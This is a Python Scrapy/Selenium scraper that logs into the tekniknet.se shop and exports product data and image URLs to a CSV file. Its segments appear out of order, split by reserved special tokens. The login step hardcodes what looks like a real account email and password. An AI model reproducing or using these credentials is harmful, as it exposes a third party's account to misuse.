csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list3[k] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(
k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list4[m] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = 'tekniknet_new'
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
username = self.driver.find_element_by_id('password')
username.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
fh, abs_path = mkstemp()
with fdopen(fh, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
old_product_url.append(line.split(',')[-1])
file = open('tekniknet.csv', 'a', errors='replace')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
